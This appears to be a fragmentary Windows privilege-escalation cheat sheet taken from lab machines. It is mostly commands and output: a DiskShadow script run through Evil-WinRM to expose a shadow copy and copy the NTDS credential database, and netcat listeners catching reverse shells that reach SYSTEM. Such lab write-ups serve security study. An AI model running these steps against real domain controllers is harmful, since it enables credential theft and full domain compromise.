Privilege Name Description State ============================= ============================== ======= ... SeBackupPrivilege Back up files and directories Enabled ...
Disk Shadow method
1 2 3 4
set context persistent nowriters add volume c: alias pwn create expose %pwn% z:
1
*Evil-WinRM* PS C:\temp> upload pwn.txt
1 2 3 4 5
*Evil-WinRM* PS C:\temp> type pwn.txt set context persistent nowriters add volume c: alias pwn create expose %pwn% z:
*Evil-WinRM* PS C:\temp> diskshadow /s pwn.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: BABYDC, 8/9/2024 10:57:34 PM
-> set context persistent nowriters -> add volume c: alias pwn -> create Alias pwn for shadow ID {041d93f3-797d-4f91-a270-5c1fb66092e6} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {7df9215a-2efb-4a28-befe-cbaf15deba8c} set as environment variable.
Querying all shadow copies with the shadow copy set ID {7df9215a-2efb-4a28-befe-cbaf15deba8c}
* Shadow copy ID = {041d93f3-797d-4f91-a270-5c1fb66092e6} %pwn% - Shadow copy set: {7df9215a-2efb-4a28-befe-cbaf15deba8c} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\] - Creation time: 8/9/2024 10:57:36 PM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: BabyDC.baby.vl - Service machine: BabyDC.baby.vl - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1 -> expose %pwn% z: -> %pwn% = {041d93f3-797d-4f91-a270-5c1fb66092e6} The shadow copy was successfully exposed as z:\. ->
------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows -------------------------------------------------------------------------------
Started : Friday, August 9, 2024 10:57:58 PM Source : z:\windows\ntds\ Dest : C:\temp\
Privilege Name Description State ============================= ========================================= ======== ... SeImpersonatePrivilege Impersonate a client after authentication Enabled ...
➜ nc -nlvp 443 listening on [any] 443 ... connect to [10.8.0.210] from (UNKNOWN) [10.10.150.182] 54910 Microsoft Windows [Version 10.0.20348.2340] (c) Microsoft Corporation. All rights reserved.
Privilege Name Description State ============================= =================================== ======= ... SeTcbPrivilege Act as part of the operating system Enabled ...
➜ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.0.210] from (UNKNOWN) [10.10.153.117] 53924 Microsoft Windows [Version 10.0.20348.2113] (c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami nt authority\system
Groups
Server Operators Group
Its members can sign-in to a server, start and stop services, access domain controllers, perform maintenance tasks (such as backup and restore), and they have the ability to change binaries that are installed on the domain controllers.
1 2 3 4 5
*Evil-WinRM* PS C:\temp> net user svc-printer ... Local Group Memberships *Print Operators *Remote Management Use *Server Operators Global Group memberships *Domain Users
➜ rlwrap nc -nlvp 9001 listening on [any] 9001 ... connect to [10.10.14.30] from (UNKNOWN) [10.10.11.108] 49634 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami nt authority\system